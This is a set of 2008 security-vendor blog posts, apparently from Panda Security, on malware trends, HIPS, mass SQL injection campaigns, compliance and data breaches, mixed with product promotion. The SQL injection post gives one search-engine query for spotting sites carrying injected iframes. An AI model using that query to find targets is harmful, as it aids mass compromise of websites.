PandaLabs Q2 Figures

July 7, 2008

Today we published our Q2 figures covering the most relevant trends in the malware landscape. Some of the key points from this Q2 report includes:

  • Distribution of Banker Trojan families by prevalence in the market.
  • Distribution of Active malware by country (this entails PCs with active malware running in memory).
  • Spam levels fluctuated between 60% to 94% of all email on the Internet

Banker Trojans continue to be a prominent factor when taking into consideration Identity Theft. As covered in the report Banker Trojans experienced a 400% increase as opposed to other years which were significantly less. In addition Russian Banker Trojans remain strong in terms of the overall distribution by family.

In the first half of Q2 2008 we saw an emergence of SQL Injection attacks being used to conduct mass hacking campaigns in order to distribute as much malware as possible. In conclusion cyber-crime only continues to evolve and should not be ignored when implementing security at your organization. The report can be found here:


Host Intrusion Prevention: Behavioral Analysis

June 13, 2008

Host Intrusion Prevention Technologies or better known as HIPS have been around for some time in the market. HIPS technologies work on the premise of providing end-point intrusion prevention against anomalous system behavior.

HIPS over the years has been developed for the anti-malware space in order to compliment existing technologies (signature and heuristics) and to improve detection capabilities. This was all part of a strategy to thwart 0-day malware by using a proactive, rather then a reactive approach to virus identification, therefore; this technology is not new to the market.

But, the ways in which the vendor goes about full-filling this model varies depending on the architecture involved. Interestingly enough there have been many misconceptions regarding the quality and effectiveness of HIPS technologies on the market today. In fact the only standard I have seen in terms of architecture has been defined by Gartner analyst Neil MacDonald.

For example rules based technologies work to a certain degree in terms of proactively defending against 0-day malware, however; often at times they require initial training and tuning before they can with confidence block an unknown threat; subsequently this results in high operating costs over-time. This is especially true given the existing complexity of diversified networks.

Most vendors on the market today have included HIPS in their technology portfolios, however; what’s missing in many offerings is behavioral analysis (very different then behavioral blocking or that of policy enforcement and control).

What is Behavioral Analysis and why is it important?

Behavioral analysis works on the premise of intelligently inspecting a running process and terminating it depending on it’s behavior (the closest thing in the computing world would be that of a neural network). In other words it’s looking at a process and it’s behavior in context and deciding if it should terminate or block that process. This is obviously not a static linear process, but a dynamic evolving process. Whereas behavioral blocking focuses on denying specific actions coming from a process relating to illegal behavior.

Similarly we have behaviroal analysis technologies included Panda TruPrevent Technologies:



SQL Injection Attacks: The future of mass hacking campaigns (updated)

June 11, 2008

SQL injection attacks are evolving as the prime mode of transportation for malicious scripts that hackers wish to insert into legitimate web-sites. Typically the web-site is a vehicle for distributing Trojans through scripts crafted to exploit certain vulnerabilities on visiting PCs.


These scripts are often designed to exploit vulnerabilities that the vendor usually has a patch available for; however, if you look at it from a statistical perspective, there will be a certain percentage of users who have not patched their systems against these vulnerabilities. In addition some of these attacks have used 0-day vulnerabilities to spread malware to unsuspecting users as in the case with the recent Adobe Flash vulnerability.


In most cases the Java script code being used to execute the vulnerability is obfuscated and very difficult to perform an analysis on, thus, the real intention behind the script (exploitation of vulnerabilities) can’t be seen by the naked eye. It takes clever decoding techniques to reveal the presence of actual exploit code.


The result is extra time and effort on the part of the anti-virus lab engineer to create an effective vaccination for malware delivered through encoded Java script.


However; the average rate of infection amongst protected networks is anywhere from 70% to 75% according to research conducted by PandaLabs on over 1200 networks across the globe. This obviously raises questions concerning the level and quality of protection companies have running on their PCs.


However; little is known about the true intentions or motivations behind these mass hacking campaigns. From our perspective it’s purely business and with a profit driven approach hackers will do pretty much anything to make a buck.


So exactly how do hackers gain access to web-sites without administrative privileges or by exploiting site specific vulnerabilities? Good question! It’s quite obvious that hackers are doing this through automation as it’s impossible to hack these sites manually. Some recent hacking campaigns have shown numbers in the range of 250,000 to 500,000 sites generically compromised almost overnight.  What is not entirely clear is how they are gaining access to these sites at such a high rate without really customizing the attack on a site-by-site basis. 
One theory is tools that incorporate the Google API framework to automate the tasks of discovering and validating if a site may be vulnerable to a SQL injection attack; a process that normally would require a visual inspection. An example of a query string that could be used is: intitle:”<iframe src=http”. This tool would also have the capability of constructing a specific injection routine to be performed against discovered targets. Certainly there are tools out there capable of conducting automated blind SQL Injection attacks including the discovery of vulnerable targets.




LayerOne Security Conference Video Available

May 23, 2008

Last weekend we participated in a smaller regional security conference in Pasadena California called LayerOne which occurs yearly at the Pasadena Hilton. There was a number of great talks and I provided one on the evolution of cyber-crime and it’s prevalence. I am making the video available here.

Yesterday’s Webinar Available!

May 22, 2008

Yesterday’s webinar on Customer Privacy, Malware and Government Regulations is now available for your viewing pleasure. Enjoy!



How regulations affect small to mid-size companies

May 20, 2008

It’s important to note that not only are large corporations affected by regulatory standards, but the small and mid-size companies are also equally affected; especially when their core business is dealing with protected classes of information by law (patient information, credit card information, financial data, etc).

A very good example is a regional medicare facility that has less then 500 employees. Now one may think that they are not subject to the same regulations mainly because of their size, but HIPAA is HIPAA and it applies to any organization that stores and maintains patient privileged information. 

For example if this fictional medicare facility were to have a screen-logger on a PC containing any of the above classes of information this could lead to a potential violation of the following and could result in fines:

HIPAA §164.308(a) (4) that pertains to protecting health information: “implement technical policies and procedures for electronic information systems that maintain electronic protected health information to allow access only to those persons or software programs that have been granted access rights as specified in §164.308(a) (4) [Information Access Management]”

It also leads me to believe that controls implemented around enforcing compliance doesn’t always lead to assurance that one is protected. This is particulary true regarding the recent high profile data security breaches occurring with corporations that have all followed regulatory standards, but some how were still compromised.

In conclusion security should not be ignored within small and mid-size companies. Especially if these companies handle protected classes of information.


Anatomy of a data breach

May 4, 2008

In 2007 and 2008 the industry has seen an upsurge in data breaches affecting millions of consumers and causing corporations to pay heavily in fines.

Data breaches can lead to exposure of consumer information through a number of different ways that vary in complexity. The common perception associated with a data breach is the difference between data being extracted from physical assets stolen and actual breaches in perimeter security (electronic).

While there is certainly a number of cases in which stolen assets account for the breach at hand, however; we are seeing a number of electronic breaches that have accounted for some of the most famous incidents of 2007 and 2008.

  1. TJ Maxx
  3. Hannaford Bros

In fact the financial community has experienced twice the many incidents in 2008 then all of 2007 according to a study conducted by the Identity Theft Resource Center (ITRC). These incidents go hand in hand with regulatory laws that were supposedly designed to mitigate and reduce the risk window in an attempt to avoid such embarrassing situations.

Take for example an organization that has been PCI compliant for years, but suffered a data breach that involved hackers placing targeted malware on credit card processing servers at a major retailer. The question the security team has to ask themselves “Why didn’t my current anti-virus solution detect the threat”? I have an interesting hypothesis on this subject that can be found in the article “Regulatory Compliance and the Real Risk of Undetected Malware.”

In 2008 implementing measures to protect against data breaches will be critical to the survival of any corporation in the long term. It’s not a matter of if you will be breached, but a matter of when, therefore; it’s important that the primary goal is to significantly reduce the acceptable loss and mitigate the window of risk.

The risk window can be significantly reduced by implementing better information assurance standards that at minimum address the following:

  1. Security audits to include more then just a vulnerability assessment or a penetration test when verifying if controls are adequate. Rather assessing for existing breaches relating to undetected malicious code.
  2. Don’t just use anti-virus as that will protect you against a small fraction of potential threats and will not detect targeted attacks. Take advantage of best of breed proactive security (HIPS or Anomaly Detection Systems).
  3. Use a multilayer approach when protecting assets (perimeter, messaging and end-point layer).

Panda Security is one step ahead when it comes to security, therefore; we have a number of technologies that will aide in reducing the risk window and eliminating as much associated loss. These technologies are divided as follows:

  1. Security audit and assessment tools (i.e. Panda Malware Radar)
  2. Proactive security (i.e. TruPrevent technologies)
  3. Fraud intelligence services (Targeted Attack Alert Services)
  4. Preventing fraudlent financial transactions (Panda Security for Internet Transactions)

Thoughts or comments?